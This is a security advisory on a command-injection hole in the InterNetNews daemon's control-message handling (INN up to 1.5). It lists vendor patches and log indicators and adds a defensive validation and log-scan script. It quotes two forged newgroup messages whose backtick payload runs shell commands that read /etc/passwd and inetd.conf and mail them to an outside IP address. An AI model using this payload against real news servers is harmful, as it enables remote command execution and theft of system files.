COMMAND
InterNetNews server (innd)
SYSTEMS AFFECTED
Systems running the InterNetNews server, up to and including v1.5.
Systems from any of the vendors listed below may be vulnerable.
Berkeley Software Design, Inc. (BSDI)
Caldera
Debian Linux
NEC Corporation
Netscape
Red Hat
NOTE: 1.5.1 could still be vulnerable; see the SOLUTION section.
PROBLEM
The INN daemon (innd) processes "newgroup" and "rmgroup" control
messages in a shell script (parsecontrol) that uses the shell's
"eval" command. However, some of the information passed to eval
comes from the message without adequate checks for characters
that are special to the shell.
This permits anyone who can send messages to an INN server -
almost anyone with Usenet access - to execute arbitrary commands
on that server. These commands run with the uid and privileges of
the "innd" process on that server. Because such messages are
usually passed through Internet firewalls to a site's news
server, servers behind such firewalls are vulnerable to attack.
Also, the program executes these commands before checking whether
the sender is authorized to create or remove newsgroups, so
checks at that level (such as running pgpverify) do not prevent
this problem. Remote, unauthorized users can execute arbitrary
commands on the system with the same privileges as the innd (INN
daemon) process.
Joseph J. Snyder III sent an example of the exploit:
Unparseable newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!gatech!EU.net!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9220@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4
#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>
#-
Unsafe newgroup by tale@uunet.uu.net
Path: nntp.xxxxxxxxx.xxx!nntp.netrex.net!sbcntrex!news.eecs.umich.edu!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4
#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-
SOLUTION
Upgrade to INN 1.5.1. Until you can do so, install the patches
available from James Brister or get help from your vendor, if it
is available.
If you do a 'make update' from a previous innd (e.g. innd1.4unoff4)
to upgrade to 1.5.1, you will still have your old parsecontrol
script, and the exploit will still work. The temporary fix is to
copy over the new parsecontrol. The real fix is a new install of
1.5.1 with the conf files, libs, etc. pushed on top.
Examine your news logs for signs of exploitation. So far, we have
reports of at least six distinct message IDs being used:
830201540.9120@uunet.uu.net
830201540.9122@uunet.uu.net
830201540.9220@uunet.uu.net
830201540.9223@uunet.uu.net
830201540.9020@uunet.uu.net
830201540.9221@uunet.uu.net
Although these messages appear to come from UUNET, the messages
were forged.
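The validation that parsecontrol lacked, together with a scan of news logs for the six Message-IDs listed above, as an added example that is not code from INN or from this advisory; the function names and the log line format are assumptions made for the illustration:

```shell
#!/bin/sh
# Added example, not INN's own parsecontrol script. It shows the check that a
# control-message handler must apply before header-derived data reaches any
# shell expansion, and a log scan for the six Message-IDs listed above.
# The function names and the log format are assumptions for this illustration.

# Accept only characters legal in a newsgroup name. Backticks, $, |, ;, quotes
# and whitespace are all rejected, so nothing reaching a later eval can inject
# a command. Returns 0 when the name is safe, 1 otherwise.
is_safe_groupname() {
    case "$1" in
        '') return 1 ;;
        *[!A-Za-z0-9.+_-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Hardened handling: validate first, then pass the name as one quoted
# argument with no eval, so shell metacharacters are never interpreted.
handle_newgroup() {
    grp="$1"
    if ! is_safe_groupname "$grp"; then
        echo "rejected newgroup control message: unsafe group name" >&2
        return 1
    fi
    printf 'would create group: %s\n' "$grp"
}

# Constructed sample of an article log (not a real INN log). One line carries
# a Message-ID from the advisory's list of forged control messages.
SAMPLE_LOG='Mar 15 15:15:15 + news.example.net <abc123@example.org> news.misc
Mar 15 15:15:16 + news.example.net <830201540.9220@uunet.uu.net> control
Mar 15 15:15:17 + news.example.net <def456@example.org> comp.sys.mac.printing'

# Count log lines that carry any of the six Message-IDs named in the advisory.
# Prints the count; a non-zero result means the forged messages reached you.
count_known_ids() {
    printf '%s\n' "$1" | grep -c -E \
        '<830201540\.(9120|9122|9220|9223|9020|9221)@uunet\.uu\.net>'
}

if [ "${1:-}" = "demo" ]; then
    handle_newgroup 'comp.sys.mac.printing'
    handle_newgroup '`/bin/sh`' || true
    printf 'known forged IDs in log: %s\n' "$(count_known_ids "$SAMPLE_LOG")"
fi
```

Run it with the argument `demo` to see one accepted and one rejected group name and the count of listed Message-IDs in the constructed log.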
It is recommended to run 1.5.1, but if you're running a pre-1.5.1
version of INN, then please go look at the web page:
http://www.isc.org/inn.html
or the ftp site
ftp://ftp.isc.org/isc/inn/patches
for patches to 1.4sec, 1.4unoff3, 1.4unoff4 and 1.5 to correct
this.
If you upgraded previously, you must apply the new patch to protect
against the new vulnerability (see innd #4 on this page). Until
you can upgrade, you need to apply two patches (see below). You
If you do not upgrade to 1.5.1, apply a patch for the version you
are running and then apply the newly released patch that
addresses the second vulnerability discussed in this advisory. If
you are running INN 1.4sec2, you should upgrade to 1.5.1 as no
patches are available.
FIRST apply:
version               patch
-------               -----
1.5                   ftp://ftp.isc.org/isc/inn/patches/security-patch.01
1.4sec                ftp://ftp.isc.org/isc/inn/patches/security-patch.02
1.4unoff3, 1.4unoff4  ftp://ftp.isc.org/isc/inn/patches/security-patch.03
THEN apply (1.5.1, 1.5, 1.4sec, 1.4unoff3, 1.4unoff4):
ftp://ftp.isc.org:/isc/inn/patches/security-patch.04
Some additional patches:
Berkeley Software Design, Inc. (BSDI)
BSDI ship INN as part of our distribution. BSD/OS 2.1 includes INN
1.4sec and 2.1 users should apply the patch referenced here.
BSD/OS 3.0 includes INN 1.4unoff4 and the patch for that version
is already included so BSD/OS 3.0 is not vulnerable as
distributed.
An upgrade package for Caldera OpenLinux Base 1.0 will appear at
Caldera's site:
ftp://ftp.caldera.com/pub/col-1.0/updates/Helsinki/004/inn-1.5.1-2.i386.rpm
The current version of INN shipped with Debian is 1.4unoff4.
However, the "unstable" (or development) tree contains inn-1.5.1.
It can be obtained from any Debian mirror in the subdirectory
debian/unstable/binary/news
There is a critical security hole in INN which affects all
versions of Red Hat Linux. A new version, inn-1.5.1-6, is now
available for Red Hat Linux 4.0 and 4.1 for all platforms. If you
are running an earlier version of Red Hat, we strongly encourage
you to upgrade to 4.1 as soon as possible, as many critical
security fixes have been made. The new version of inn is PGP
signed with the Red Hat PGP key, which is available on all Red
Hat CDROMs, ftp.redhat.com, and public keyservers.
You may upgrade to the new version as follows:
Red Hat 4.1
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/sparc/inn-1.5.1-6.sparc.rpm
Red Hat 4.0
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/sparc/inn-1.5.1-6.sparc.rpm
NEC Corporation
The products below ship with the INN version discussed here, so they
are vulnerable; patches are in progress.
Goah/NetworkSV R1.2 vulnerable
Goah/NetworkSV R2.2 vulnerable
Goah/NetworkSV R3.1 vulnerable
Goah/IntraSV R1.1 vulnerable
Netscape
The Netscape News Server 2.01 is immune to the attack outlined
here. The News Server 1.1 is, however, subject to the same
vulnerability as INN, and Netscape has advised customers to
install the patch described in this CERT advisory.
After installing any of the patches or updates, ensure that you
restart your INN server.